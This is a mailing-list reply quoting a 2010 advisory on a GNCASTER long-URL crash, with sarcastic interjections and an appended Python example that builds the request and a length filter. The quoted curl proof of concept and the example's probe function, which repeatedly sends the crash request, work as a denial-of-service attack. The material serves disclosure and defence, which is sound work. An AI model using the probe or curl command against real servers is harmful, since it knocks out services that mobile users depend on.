Re: [Full-disclosure] [RT-SA-2010-001] Geo++(R) GNCASTER: Insecure handling of long URLs
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] [RT-SA-2010-001] Geo++(R) GNCASTER: Insecure handling of long URLs
- From: Jeff Williams <jeffwillis30@xxxxxxxxx>
- Date: Wed, 27 Jan 2010 08:10:37 -0500
> RedTeam Pentesting believes it is
> also possible to exploit this vulnerability to execute code on the
> server.
>
> Can't you open a debugger?
>
> Proof of Concept
> ================
>
> The following command can be used to crash the server if it is called
> multiple times:
>
> $ curl -i "http://gncaster.example.com:1234/`perl -e 'printf "A"x988'`"
>
>
>
Jeremy's back yo !
>
> Workaround
> ==========
>
> A vulnerable server could be protected from this vulnerability by an
> application layer firewall that filters overly long HTTP GET requests.
>
>
> Fix
> ===
>
> Update GNCASTER to version 1.4.0.8.
>
>
> Security Risk
> =============
>
> This vulnerability can be used for very efficient DoS attacks. This is
> especially serious as GNCaster is a real time application that is
> typically used by multiple mobile clients that rely on a functioning
> server. The vulnerability could potentially also be leveraged to remote
> code execution on the server. The risk is therefore regarded as high.
>
>
> History
> =======
>
> 2009-07-06 Vulnerability identified during a penetration test
> 2009-07-14 Meeting with customer
>
// 8 days later, wtf?!?
> 2009-12-01 Vendor releases fixed version
> 2010-01-27 Advisory released
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
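The advisory's proof of concept is a GET whose path is 988 bytes of "A", and its workaround is an application-layer filter that drops overly long GET requests. The following is an added example, not code from the advisory, from RedTeam Pentesting or from the list post: it builds the raw request that the quoted curl command would send, implements the request-target length check such a filter would apply, and includes an optional probe that repeats the request and records whether the listener still answers. The threshold MAX_TARGET_LEN, the host and port values, and the function names are assumptions chosen for illustration.

```python
"""Added example (not from the advisory or the list post).

Builds the long-URL request described in RT-SA-2010-001 and shows the
request-length check an application-layer filter could apply as the
advisory's workaround. Limits and names are assumptions.
"""
import socket

# The advisory's proof of concept uses a 988-byte path segment.
POC_PATH_LEN = 988

# Assumed filter threshold: mount-point names on a caster are short, so
# anything beyond this is rejected. Chosen to sit well below the 988
# bytes of the PoC; the value itself is an assumption.
MAX_TARGET_LEN = 256


def build_request(path_len: int = POC_PATH_LEN,
                  host: str = "gncaster.example.com",
                  port: int = 1234) -> bytes:
    """Return the raw HTTP/1.1 GET that the PoC curl command would send."""
    target = "/" + "A" * path_len
    return (
        f"GET {target} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "User-Agent: curl\r\n"
        "Accept: */*\r\n"
        "\r\n"
    ).encode("ascii")


def request_target_length(raw: bytes) -> int:
    """Byte length of the request target (between method and HTTP version)."""
    request_line = raw.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    return len(parts[1])


def allow_request(raw: bytes, limit: int = MAX_TARGET_LEN) -> bool:
    """Workaround check: accept only requests whose target fits the limit.

    Malformed request lines are rejected as well, since the filter sits in
    front of a server that must not see anything it cannot parse safely.
    """
    try:
        return request_target_length(raw) <= limit
    except ValueError:
        return False


def probe(host: str, port: int, attempts: int = 3,
          timeout: float = 5.0) -> list:
    """Send the PoC request `attempts` times and record whether the server
    still answers. Needs network access; not exercised offline.

    Each entry is "answered" (data came back), "closed" (connection dropped
    without data), "timeout" (no reply within `timeout`) or "refused"
    (TCP connect failed, i.e. the listener is gone).
    """
    outcomes = []
    for _ in range(attempts):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall(build_request(host=host, port=port))
                data = s.recv(1024)
                outcomes.append("answered" if data else "closed")
        except ConnectionRefusedError:
            outcomes.append("refused")
        except socket.timeout:
            outcomes.append("timeout")
    return outcomes


if __name__ == "__main__":
    poc = build_request()
    print("PoC target length:", request_target_length(poc))
    print("filter allows PoC:", allow_request(poc))
    print("filter allows /MOUNT:",
          allow_request(b"GET /MOUNT HTTP/1.1\r\nHost: x\r\n\r\n"))
```

The filter only inspects the request line, which is all the advisory's workaround requires; a real deployment would put the same check in whatever reverse proxy or application-layer firewall fronts the caster, and would keep the limit just above the longest legitimate mount-point name in use.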